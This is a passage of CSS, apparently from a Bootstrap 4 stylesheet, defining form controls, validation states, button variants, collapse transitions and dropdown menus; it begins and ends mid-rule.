  padding-bottom: calc(0.375rem + 1px);
  margin-bottom: 0;
  font-size: inherit;
  line-height: 1.5;
}

.col-form-label-lg {
  padding-top: calc(0.5rem + 1px);
  padding-bottom: calc(0.5rem + 1px);
  font-size: 1.25rem;
  line-height: 1.5;
}

.col-form-label-sm {
  padding-top: calc(0.25rem + 1px);
  padding-bottom: calc(0.25rem + 1px);
  font-size: 0.875rem;
  line-height: 1.5;
}

.form-control-plaintext {
  display: block;
  width: 100%;
  padding-top: 0.375rem;
  padding-bottom: 0.375rem;
  margin-bottom: 0;
  line-height: 1.5;
  background-color: transparent;
  border: solid transparent;
  border-width: 1px 0;
}

.form-control-plaintext.form-control-sm, .input-group-sm > .form-control-plaintext.form-control,
.input-group-sm > .input-group-prepend > .form-control-plaintext.input-group-text,
.input-group-sm > .input-group-append > .form-control-plaintext.input-group-text,
.input-group-sm > .input-group-prepend > .form-control-plaintext.btn,
.input-group-sm > .input-group-append > .form-control-plaintext.btn, .form-control-plaintext.form-control-lg, .input-group-lg > .form-control-plaintext.form-control,
.input-group-lg > .input-group-prepend > .form-control-plaintext.input-group-text,
.input-group-lg > .input-group-append > .form-control-plaintext.input-group-text,
.input-group-lg > .input-group-prepend > .form-control-plaintext.btn,
.input-group-lg > .input-group-append > .form-control-plaintext.btn {
  padding-right: 0;
  padding-left: 0;
}

.form-control-sm, .input-group-sm > .form-control,
.input-group-sm > .input-group-prepend > .input-group-text,
.input-group-sm > .input-group-append > .input-group-text,
.input-group-sm > .input-group-prepend > .btn,
.input-group-sm > .input-group-append > .btn {
  padding: 0.25rem 0.5rem;
  font-size: 0.875rem;
  line-height: 1.5;
  border-radius: 0.2rem;
}

select.form-control-sm:not([size]):not([multiple]), .input-group-sm > select.form-control:not([size]):not([multiple]),
.input-group-sm > .input-group-prepend > select.input-group-text:not([size]):not([multiple]),
.input-group-sm > .input-group-append > select.input-group-text:not([size]):not([multiple]),
.input-group-sm > .input-group-prepend > select.btn:not([size]):not([multiple]),
.input-group-sm > .input-group-append > select.btn:not([size]):not([multiple]) {
  height: calc(1.8125rem + 2px);
}

.form-control-lg, .input-group-lg > .form-control,
.input-group-lg > .input-group-prepend > .input-group-text,
.input-group-lg > .input-group-append > .input-group-text,
.input-group-lg > .input-group-prepend > .btn,
.input-group-lg > .input-group-append > .btn {
  padding: 0.5rem 1rem;
  font-size: 1.25rem;
  line-height: 1.5;
  border-radius: 0.3rem;
}

select.form-control-lg:not([size]):not([multiple]), .input-group-lg > select.form-control:not([size]):not([multiple]),
.input-group-lg > .input-group-prepend > select.input-group-text:not([size]):not([multiple]),
.input-group-lg > .input-group-append > select.input-group-text:not([size]):not([multiple]),
.input-group-lg > .input-group-prepend > select.btn:not([size]):not([multiple]),
.input-group-lg > .input-group-append > select.btn:not([size]):not([multiple]) {
  height: calc(2.875rem + 2px);
}

.form-group {
  margin-bottom: 1rem;
}

.form-text {
  display: block;
  margin-top: 0.25rem;
}

.form-row {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
  margin-right: -5px;
  margin-left: -5px;
}

.form-row > .col,
.form-row > [class*="col-"] {
  padding-right: 5px;
  padding-left: 5px;
}

.form-check {
  position: relative;
  display: block;
  padding-left: 1.25rem;
}

.form-check-input {
  position: absolute;
  margin-top: 0.3rem;
  margin-left: -1.25rem;
}

.form-check-input:disabled ~ .form-check-label {
  color: #6c757d;
}

.form-check-label {
  margin-bottom: 0;
}

.form-check-inline {
  display: -webkit-inline-box;
  display: -ms-inline-flexbox;
  display: inline-flex;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
  padding-left: 0;
  margin-right: 0.75rem;
}

.form-check-inline .form-check-input {
  position: static;
  margin-top: 0;
  margin-right: 0.3125rem;
  margin-left: 0;
}

.valid-feedback {
  display: none;
  width: 100%;
  margin-top: 0.25rem;
  font-size: 80%;
  color: #28a745;
}

.valid-tooltip {
  position: absolute;
  top: 100%;
  z-index: 5;
  display: none;
  max-width: 100%;
  padding: .5rem;
  margin-top: .1rem;
  font-size: .875rem;
  line-height: 1;
  color: #fff;
  background-color: rgba(40, 167, 69, 0.8);
  border-radius: .2rem;
}

.was-validated .form-control:valid, .form-control.is-valid, .was-validated
.custom-select:valid,
.custom-select.is-valid {
  border-color: #28a745;
}

.was-validated .form-control:valid:focus, .form-control.is-valid:focus, .was-validated
.custom-select:valid:focus,
.custom-select.is-valid:focus {
  border-color: #28a745;
  box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25);
}

.was-validated .form-control:valid ~ .valid-feedback,
.was-validated .form-control:valid ~ .valid-tooltip, .form-control.is-valid ~ .valid-feedback,
.form-control.is-valid ~ .valid-tooltip, .was-validated
.custom-select:valid ~ .valid-feedback,
.was-validated
.custom-select:valid ~ .valid-tooltip,
.custom-select.is-valid ~ .valid-feedback,
.custom-select.is-valid ~ .valid-tooltip {
  display: block;
}

.was-validated .form-check-input:valid ~ .form-check-label, .form-check-input.is-valid ~ .form-check-label {
  color: #28a745;
}

.was-validated .form-check-input:valid ~ .valid-feedback,
.was-validated .form-check-input:valid ~ .valid-tooltip, .form-check-input.is-valid ~ .valid-feedback,
.form-check-input.is-valid ~ .valid-tooltip {
  display: block;
}

.was-validated .custom-control-input:valid ~ .custom-control-label, .custom-control-input.is-valid ~ .custom-control-label {
  color: #28a745;
}

.was-validated .custom-control-input:valid ~ .custom-control-label::before, .custom-control-input.is-valid ~ .custom-control-label::before {
  background-color: #71dd8a;
}

.was-validated .custom-control-input:valid ~ .valid-feedback,
.was-validated .custom-control-input:valid ~ .valid-tooltip, .custom-control-input.is-valid ~ .valid-feedback,
.custom-control-input.is-valid ~ .valid-tooltip {
  display: block;
}

.was-validated .custom-control-input:valid:checked ~ .custom-control-label::before, .custom-control-input.is-valid:checked ~ .custom-control-label::before {
  background-color: #34ce57;
}

.was-validated .custom-control-input:valid:focus ~ .custom-control-label::before, .custom-control-input.is-valid:focus ~ .custom-control-label::before {
  box-shadow: 0 0 0 1px #fff, 0 0 0 0.2rem rgba(40, 167, 69, 0.25);
}

.was-validated .custom-file-input:valid ~ .custom-file-label, .custom-file-input.is-valid ~ .custom-file-label {
  border-color: #28a745;
}

.was-validated .custom-file-input:valid ~ .custom-file-label::before, .custom-file-input.is-valid ~ .custom-file-label::before {
  border-color: inherit;
}

.was-validated .custom-file-input:valid ~ .valid-feedback,
.was-validated .custom-file-input:valid ~ .valid-tooltip, .custom-file-input.is-valid ~ .valid-feedback,
.custom-file-input.is-valid ~ .valid-tooltip {
  display: block;
}

.was-validated .custom-file-input:valid:focus ~ .custom-file-label, .custom-file-input.is-valid:focus ~ .custom-file-label {
  box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25);
}

.invalid-feedback {
  display: none;
  width: 100%;
  margin-top: 0.25rem;
  font-size: 80%;
  color: #dc3545;
}

.invalid-tooltip {
  position: absolute;
  top: 100%;
  z-index: 5;
  display: none;
  max-width: 100%;
  padding: .5rem;
  margin-top: .1rem;
  font-size: .875rem;
  line-height: 1;
  color: #fff;
  background-color: rgba(220, 53, 69, 0.8);
  border-radius: .2rem;
}

.was-validated .form-control:invalid, .form-control.is-invalid, .was-validated
.custom-select:invalid,
.custom-select.is-invalid {
  border-color: #dc3545;
}

.was-validated .form-control:invalid:focus, .form-control.is-invalid:focus, .was-validated
.custom-select:invalid:focus,
.custom-select.is-invalid:focus {
  border-color: #dc3545;
  box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25);
}

.was-validated .form-control:invalid ~ .invalid-feedback,
.was-validated .form-control:invalid ~ .invalid-tooltip, .form-control.is-invalid ~ .invalid-feedback,
.form-control.is-invalid ~ .invalid-tooltip, .was-validated
.custom-select:invalid ~ .invalid-feedback,
.was-validated
.custom-select:invalid ~ .invalid-tooltip,
.custom-select.is-invalid ~ .invalid-feedback,
.custom-select.is-invalid ~ .invalid-tooltip {
  display: block;
}

.was-validated .form-check-input:invalid ~ .form-check-label, .form-check-input.is-invalid ~ .form-check-label {
  color: #dc3545;
}

.was-validated .form-check-input:invalid ~ .invalid-feedback,
.was-validated .form-check-input:invalid ~ .invalid-tooltip, .form-check-input.is-invalid ~ .invalid-feedback,
.form-check-input.is-invalid ~ .invalid-tooltip {
  display: block;
}

.was-validated .custom-control-input:invalid ~ .custom-control-label, .custom-control-input.is-invalid ~ .custom-control-label {
  color: #dc3545;
}

.was-validated .custom-control-input:invalid ~ .custom-control-label::before, .custom-control-input.is-invalid ~ .custom-control-label::before {
  background-color: #efa2a9;
}

.was-validated .custom-control-input:invalid ~ .invalid-feedback,
.was-validated .custom-control-input:invalid ~ .invalid-tooltip, .custom-control-input.is-invalid ~ .invalid-feedback,
.custom-control-input.is-invalid ~ .invalid-tooltip {
  display: block;
}

.was-validated .custom-control-input:invalid:checked ~ .custom-control-label::before, .custom-control-input.is-invalid:checked ~ .custom-control-label::before {
  background-color: #e4606d;
}

.was-validated .custom-control-input:invalid:focus ~ .custom-control-label::before, .custom-control-input.is-invalid:focus ~ .custom-control-label::before {
  box-shadow: 0 0 0 1px #fff, 0 0 0 0.2rem rgba(220, 53, 69, 0.25);
}

.was-validated .custom-file-input:invalid ~ .custom-file-label, .custom-file-input.is-invalid ~ .custom-file-label {
  border-color: #dc3545;
}

.was-validated .custom-file-input:invalid ~ .custom-file-label::before, .custom-file-input.is-invalid ~ .custom-file-label::before {
  border-color: inherit;
}

.was-validated .custom-file-input:invalid ~ .invalid-feedback,
.was-validated .custom-file-input:invalid ~ .invalid-tooltip, .custom-file-input.is-invalid ~ .invalid-feedback,
.custom-file-input.is-invalid ~ .invalid-tooltip {
  display: block;
}

.was-validated .custom-file-input:invalid:focus ~ .custom-file-label, .custom-file-input.is-invalid:focus ~ .custom-file-label {
  box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25);
}

.form-inline {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
  -ms-flex-flow: row wrap;
  flex-flow: row wrap;
  -webkit-box-align: center;
  -ms-flex-align: center;
  align-items: center;
}

.form-inline .form-check {
  width: 100%;
}

@media (min-width: 576px) {
  .form-inline label {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: center;
    -ms-flex-pack: center;
    justify-content: center;
    margin-bottom: 0;
  }
  .form-inline .form-group {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-flex: 0;
    -ms-flex: 0 0 auto;
    flex: 0 0 auto;
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-flow: row wrap;
    flex-flow: row wrap;
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    margin-bottom: 0;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-plaintext {
    display: inline-block;
  }
  .form-inline .input-group {
    width: auto;
  }
  .form-inline .form-check {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: center;
    -ms-flex-pack: center;
    justify-content: center;
    width: auto;
    padding-left: 0;
  }
  .form-inline .form-check-input {
    position: relative;
    margin-top: 0;
    margin-right: 0.25rem;
    margin-left: 0;
  }
  .form-inline .custom-control {
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    -webkit-box-pack: center;
    -ms-flex-pack: center;
    justify-content: center;
  }
  .form-inline .custom-control-label {
    margin-bottom: 0;
  }
}

.btn {
  display: inline-block;
  font-weight: 400;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  border: 1px solid transparent;
  padding: 0.375rem 0.75rem;
  font-size: 1rem;
  line-height: 1.5;
  border-radius: 0.25rem;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}

.btn:hover, .btn:focus {
  text-decoration: none;
}

.btn:focus, .btn.focus {
  outline: 0;
  box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.25);
}

.btn.disabled, .btn:disabled {
  opacity: 0.65;
}

.btn:not(:disabled):not(.disabled) {
  cursor: pointer;
}

.btn:not(:disabled):not(.disabled):active, .btn:not(:disabled):not(.disabled).active {
  background-image: none;
}

a.btn.disabled,
fieldset:disabled a.btn {
  pointer-events: none;
}

.btn-primary {
  color: #fff;
  background-color: #007bff;
  border-color: #007bff;
}

.btn-primary:hover {
  color: #fff;
  background-color: #0069d9;
  border-color: #0062cc;
}

.btn-primary:focus, .btn-primary.focus {
  box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.5);
}

.btn-primary.disabled, .btn-primary:disabled {
  color: #fff;
  background-color: #007bff;
  border-color: #007bff;
}

.btn-primary:not(:disabled):not(.disabled):active, .btn-primary:not(:disabled):not(.disabled).active,
.show > .btn-primary.dropdown-toggle {
  color: #fff;
  background-color: #0062cc;
  border-color: #005cbf;
}

.btn-primary:not(:disabled):not(.disabled):active:focus, .btn-primary:not(:disabled):not(.disabled).active:focus,
.show > .btn-primary.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.5);
}

.btn-secondary {
  color: #fff;
  background-color: #6c757d;
  border-color: #6c757d;
}

.btn-secondary:hover {
  color: #fff;
  background-color: #5a6268;
  border-color: #545b62;
}

.btn-secondary:focus, .btn-secondary.focus {
  box-shadow: 0 0 0 0.2rem rgba(108, 117, 125, 0.5);
}

.btn-secondary.disabled, .btn-secondary:disabled {
  color: #fff;
  background-color: #6c757d;
  border-color: #6c757d;
}

.btn-secondary:not(:disabled):not(.disabled):active, .btn-secondary:not(:disabled):not(.disabled).active,
.show > .btn-secondary.dropdown-toggle {
  color: #fff;
  background-color: #545b62;
  border-color: #4e555b;
}

.btn-secondary:not(:disabled):not(.disabled):active:focus, .btn-secondary:not(:disabled):not(.disabled).active:focus,
.show > .btn-secondary.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(108, 117, 125, 0.5);
}

.btn-success {
  color: #fff;
  background-color: #28a745;
  border-color: #28a745;
}

.btn-success:hover {
  color: #fff;
  background-color: #218838;
  border-color: #1e7e34;
}

.btn-success:focus, .btn-success.focus {
  box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.5);
}

.btn-success.disabled, .btn-success:disabled {
  color: #fff;
  background-color: #28a745;
  border-color: #28a745;
}

.btn-success:not(:disabled):not(.disabled):active, .btn-success:not(:disabled):not(.disabled).active,
.show > .btn-success.dropdown-toggle {
  color: #fff;
  background-color: #1e7e34;
  border-color: #1c7430;
}

.btn-success:not(:disabled):not(.disabled):active:focus, .btn-success:not(:disabled):not(.disabled).active:focus,
.show > .btn-success.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.5);
}

.btn-info {
  color: #fff;
  background-color: #17a2b8;
  border-color: #17a2b8;
}

.btn-info:hover {
  color: #fff;
  background-color: #138496;
  border-color: #117a8b;
}

.btn-info:focus, .btn-info.focus {
  box-shadow: 0 0 0 0.2rem rgba(23, 162, 184, 0.5);
}

.btn-info.disabled, .btn-info:disabled {
  color: #fff;
  background-color: #17a2b8;
  border-color: #17a2b8;
}

.btn-info:not(:disabled):not(.disabled):active, .btn-info:not(:disabled):not(.disabled).active,
.show > .btn-info.dropdown-toggle {
  color: #fff;
  background-color: #117a8b;
  border-color: #10707f;
}

.btn-info:not(:disabled):not(.disabled):active:focus, .btn-info:not(:disabled):not(.disabled).active:focus,
.show > .btn-info.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(23, 162, 184, 0.5);
}

.btn-warning {
  color: #212529;
  background-color: #ffc107;
  border-color: #ffc107;
}

.btn-warning:hover {
  color: #212529;
  background-color: #e0a800;
  border-color: #d39e00;
}

.btn-warning:focus, .btn-warning.focus {
  box-shadow: 0 0 0 0.2rem rgba(255, 193, 7, 0.5);
}

.btn-warning.disabled, .btn-warning:disabled {
  color: #212529;
  background-color: #ffc107;
  border-color: #ffc107;
}

.btn-warning:not(:disabled):not(.disabled):active, .btn-warning:not(:disabled):not(.disabled).active,
.show > .btn-warning.dropdown-toggle {
  color: #212529;
  background-color: #d39e00;
  border-color: #c69500;
}

.btn-warning:not(:disabled):not(.disabled):active:focus, .btn-warning:not(:disabled):not(.disabled).active:focus,
.show > .btn-warning.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(255, 193, 7, 0.5);
}

.btn-danger {
  color: #fff;
  background-color: #dc3545;
  border-color: #dc3545;
}

.btn-danger:hover {
  color: #fff;
  background-color: #c82333;
  border-color: #bd2130;
}

.btn-danger:focus, .btn-danger.focus {
  box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.5);
}

.btn-danger.disabled, .btn-danger:disabled {
  color: #fff;
  background-color: #dc3545;
  border-color: #dc3545;
}

.btn-danger:not(:disabled):not(.disabled):active, .btn-danger:not(:disabled):not(.disabled).active,
.show > .btn-danger.dropdown-toggle {
  color: #fff;
  background-color: #bd2130;
  border-color: #b21f2d;
}

.btn-danger:not(:disabled):not(.disabled):active:focus, .btn-danger:not(:disabled):not(.disabled).active:focus,
.show > .btn-danger.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.5);
}

.btn-light {
  color: #212529;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}

.btn-light:hover {
  color: #212529;
  background-color: #e2e6ea;
  border-color: #dae0e5;
}

.btn-light:focus, .btn-light.focus {
  box-shadow: 0 0 0 0.2rem rgba(248, 249, 250, 0.5);
}

.btn-light.disabled, .btn-light:disabled {
  color: #212529;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}

.btn-light:not(:disabled):not(.disabled):active, .btn-light:not(:disabled):not(.disabled).active,
.show > .btn-light.dropdown-toggle {
  color: #212529;
  background-color: #dae0e5;
  border-color: #d3d9df;
}

.btn-light:not(:disabled):not(.disabled):active:focus, .btn-light:not(:disabled):not(.disabled).active:focus,
.show > .btn-light.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(248, 249, 250, 0.5);
}

.btn-dark {
  color: #fff;
  background-color: #343a40;
  border-color: #343a40;
}

.btn-dark:hover {
  color: #fff;
  background-color: #23272b;
  border-color: #1d2124;
}

.btn-dark:focus, .btn-dark.focus {
  box-shadow: 0 0 0 0.2rem rgba(52, 58, 64, 0.5);
}

.btn-dark.disabled, .btn-dark:disabled {
  color: #fff;
  background-color: #343a40;
  border-color: #343a40;
}

.btn-dark:not(:disabled):not(.disabled):active, .btn-dark:not(:disabled):not(.disabled).active,
.show > .btn-dark.dropdown-toggle {
  color: #fff;
  background-color: #1d2124;
  border-color: #171a1d;
}

.btn-dark:not(:disabled):not(.disabled):active:focus, .btn-dark:not(:disabled):not(.disabled).active:focus,
.show > .btn-dark.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(52, 58, 64, 0.5);
}

.btn-outline-primary {
  color: #007bff;
  background-color: transparent;
  background-image: none;
  border-color: #007bff;
}

.btn-outline-primary:hover {
  color: #fff;
  background-color: #007bff;
  border-color: #007bff;
}

.btn-outline-primary:focus, .btn-outline-primary.focus {
  box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.5);
}

.btn-outline-primary.disabled, .btn-outline-primary:disabled {
  color: #007bff;
  background-color: transparent;
}

.btn-outline-primary:not(:disabled):not(.disabled):active, .btn-outline-primary:not(:disabled):not(.disabled).active,
.show > .btn-outline-primary.dropdown-toggle {
  color: #fff;
  background-color: #007bff;
  border-color: #007bff;
}

.btn-outline-primary:not(:disabled):not(.disabled):active:focus, .btn-outline-primary:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-primary.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.5);
}

.btn-outline-secondary {
  color: #6c757d;
  background-color: transparent;
  background-image: none;
  border-color: #6c757d;
}

.btn-outline-secondary:hover {
  color: #fff;
  background-color: #6c757d;
  border-color: #6c757d;
}

.btn-outline-secondary:focus, .btn-outline-secondary.focus {
  box-shadow: 0 0 0 0.2rem rgba(108, 117, 125, 0.5);
}

.btn-outline-secondary.disabled, .btn-outline-secondary:disabled {
  color: #6c757d;
  background-color: transparent;
}

.btn-outline-secondary:not(:disabled):not(.disabled):active, .btn-outline-secondary:not(:disabled):not(.disabled).active,
.show > .btn-outline-secondary.dropdown-toggle {
  color: #fff;
  background-color: #6c757d;
  border-color: #6c757d;
}

.btn-outline-secondary:not(:disabled):not(.disabled):active:focus, .btn-outline-secondary:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-secondary.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(108, 117, 125, 0.5);
}

.btn-outline-success {
  color: #28a745;
  background-color: transparent;
  background-image: none;
  border-color: #28a745;
}

.btn-outline-success:hover {
  color: #fff;
  background-color: #28a745;
  border-color: #28a745;
}

.btn-outline-success:focus, .btn-outline-success.focus {
  box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.5);
}

.btn-outline-success.disabled, .btn-outline-success:disabled {
  color: #28a745;
  background-color: transparent;
}

.btn-outline-success:not(:disabled):not(.disabled):active, .btn-outline-success:not(:disabled):not(.disabled).active,
.show > .btn-outline-success.dropdown-toggle {
  color: #fff;
  background-color: #28a745;
  border-color: #28a745;
}

.btn-outline-success:not(:disabled):not(.disabled):active:focus, .btn-outline-success:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-success.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.5);
}

.btn-outline-info {
  color: #17a2b8;
  background-color: transparent;
  background-image: none;
  border-color: #17a2b8;
}

.btn-outline-info:hover {
  color: #fff;
  background-color: #17a2b8;
  border-color: #17a2b8;
}

.btn-outline-info:focus, .btn-outline-info.focus {
  box-shadow: 0 0 0 0.2rem rgba(23, 162, 184, 0.5);
}

.btn-outline-info.disabled, .btn-outline-info:disabled {
  color: #17a2b8;
  background-color: transparent;
}

.btn-outline-info:not(:disabled):not(.disabled):active, .btn-outline-info:not(:disabled):not(.disabled).active,
.show > .btn-outline-info.dropdown-toggle {
  color: #fff;
  background-color: #17a2b8;
  border-color: #17a2b8;
}

.btn-outline-info:not(:disabled):not(.disabled):active:focus, .btn-outline-info:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-info.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(23, 162, 184, 0.5);
}

.btn-outline-warning {
  color: #ffc107;
  background-color: transparent;
  background-image: none;
  border-color: #ffc107;
}

.btn-outline-warning:hover {
  color: #212529;
  background-color: #ffc107;
  border-color: #ffc107;
}

.btn-outline-warning:focus, .btn-outline-warning.focus {
  box-shadow: 0 0 0 0.2rem rgba(255, 193, 7, 0.5);
}

.btn-outline-warning.disabled, .btn-outline-warning:disabled {
  color: #ffc107;
  background-color: transparent;
}

.btn-outline-warning:not(:disabled):not(.disabled):active, .btn-outline-warning:not(:disabled):not(.disabled).active,
.show > .btn-outline-warning.dropdown-toggle {
  color: #212529;
  background-color: #ffc107;
  border-color: #ffc107;
}

.btn-outline-warning:not(:disabled):not(.disabled):active:focus, .btn-outline-warning:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-warning.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(255, 193, 7, 0.5);
}

.btn-outline-danger {
  color: #dc3545;
  background-color: transparent;
  background-image: none;
  border-color: #dc3545;
}

.btn-outline-danger:hover {
  color: #fff;
  background-color: #dc3545;
  border-color: #dc3545;
}

.btn-outline-danger:focus, .btn-outline-danger.focus {
  box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.5);
}

.btn-outline-danger.disabled, .btn-outline-danger:disabled {
  color: #dc3545;
  background-color: transparent;
}

.btn-outline-danger:not(:disabled):not(.disabled):active, .btn-outline-danger:not(:disabled):not(.disabled).active,
.show > .btn-outline-danger.dropdown-toggle {
  color: #fff;
  background-color: #dc3545;
  border-color: #dc3545;
}

.btn-outline-danger:not(:disabled):not(.disabled):active:focus, .btn-outline-danger:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-danger.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.5);
}

.btn-outline-light {
  color: #f8f9fa;
  background-color: transparent;
  background-image: none;
  border-color: #f8f9fa;
}

.btn-outline-light:hover {
  color: #212529;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}

.btn-outline-light:focus, .btn-outline-light.focus {
  box-shadow: 0 0 0 0.2rem rgba(248, 249, 250, 0.5);
}

.btn-outline-light.disabled, .btn-outline-light:disabled {
  color: #f8f9fa;
  background-color: transparent;
}

.btn-outline-light:not(:disabled):not(.disabled):active, .btn-outline-light:not(:disabled):not(.disabled).active,
.show > .btn-outline-light.dropdown-toggle {
  color: #212529;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}

.btn-outline-light:not(:disabled):not(.disabled):active:focus, .btn-outline-light:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-light.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(248, 249, 250, 0.5);
}

.btn-outline-dark {
  color: #343a40;
  background-color: transparent;
  background-image: none;
  border-color: #343a40;
}

.btn-outline-dark:hover {
  color: #fff;
  background-color: #343a40;
  border-color: #343a40;
}

.btn-outline-dark:focus, .btn-outline-dark.focus {
  box-shadow: 0 0 0 0.2rem rgba(52, 58, 64, 0.5);
}

.btn-outline-dark.disabled, .btn-outline-dark:disabled {
  color: #343a40;
  background-color: transparent;
}

.btn-outline-dark:not(:disabled):not(.disabled):active, .btn-outline-dark:not(:disabled):not(.disabled).active,
.show > .btn-outline-dark.dropdown-toggle {
  color: #fff;
  background-color: #343a40;
  border-color: #343a40;
}

.btn-outline-dark:not(:disabled):not(.disabled):active:focus, .btn-outline-dark:not(:disabled):not(.disabled).active:focus,
.show > .btn-outline-dark.dropdown-toggle:focus {
  box-shadow: 0 0 0 0.2rem rgba(52, 58, 64, 0.5);
}

.btn-link {
  font-weight: 400;
  color: #007bff;
  background-color: transparent;
}

.btn-link:hover {
  color: #0056b3;
  text-decoration: underline;
  background-color: transparent;
  border-color: transparent;
}

.btn-link:focus, .btn-link.focus {
  text-decoration: underline;
  border-color: transparent;
  box-shadow: none;
}

.btn-link:disabled, .btn-link.disabled {
  color: #6c757d;
}

.btn-lg, .btn-group-lg > .btn {
  padding: 0.5rem 1rem;
  font-size: 1.25rem;
  line-height: 1.5;
  border-radius: 0.3rem;
}

.btn-sm, .btn-group-sm > .btn {
  padding: 0.25rem 0.5rem;
  font-size: 0.875rem;
  line-height: 1.5;
  border-radius: 0.2rem;
}

.btn-block {
  display: block;
  width: 100%;
}

.btn-block + .btn-block {
  margin-top: 0.5rem;
}

input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}

.fade {
  opacity: 0;
  transition: opacity 0.15s linear;
}

.fade.show {
  opacity: 1;
}

.collapse {
  display: none;
}

.collapse.show {
  display: block;
}

tr.collapse.show {
  display: table-row;
}

tbody.collapse.show {
  display: table-row-group;
}

.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  transition: height 0.35s ease;
}

.dropup,
.dropdown {
  position: relative;
}

.dropdown-toggle::after {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid;
  border-right: 0.3em solid transparent;
  border-bottom: 0;
  border-left: 0.3em solid transparent;
}

.dropdown-toggle:empty::after {
  margin-left: 0;
}

.dropdown-menu {
  position: absolute;
  top: 100%;
  left: 0;
  z-index: 1000;
  display: none;
  float: left;
  min-width: 10rem;
  padding: 0.5rem 0;
  margin: 0.125rem 0 0;
  font-size: 1rem;
  color: #212529;
  text-align: left;
  list-style: none;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.15);
  border-radius: 0.25rem;
}

.dropup .dropdown-menu {
  margin-top: 0;
  margin-bottom: 0.125rem;
}

.dropup .dropdown-toggle::after {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0;
  border-right: 0.3em solid transparent;
  border-bottom: 0.3em solid;
  border-left: 0.3em solid transparent;
}

.dropup .dropdown-toggle:empty::after {
  margin-left: 0;
}

.dropright .dropdown-menu {
  margin-top: 0;
  margin-left: 0.125rem;
}

.dropright .dropdown-toggle::after {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid transparent;
  border-bottom: 0.3em solid transparent;
  border-left: 0.3em solid;
}

.dropright .dropdown-toggle:empty::after {
  margin-left: 0;
}

.dropright .dropdown-toggle::after {
  vertical-align: 0;
}

.dropleft .dropdown-menu {
  margin-top: 0;
  margin-right: 0.125rem;
}

.dropleft .dropdown-toggle::after {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
}

.dropleft .dropdown-toggle::after {
  display: none;
}

.dropleft .dropdown-toggle::before {
  display: inline-block;
  width: 0;
  height: 0;
  margin-right: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid transparent;
  border-right: 0.3em solid;
  border-bottom: 0.3em solid transparent;
}

.dropleft .dropdown-toggle:empty::after {
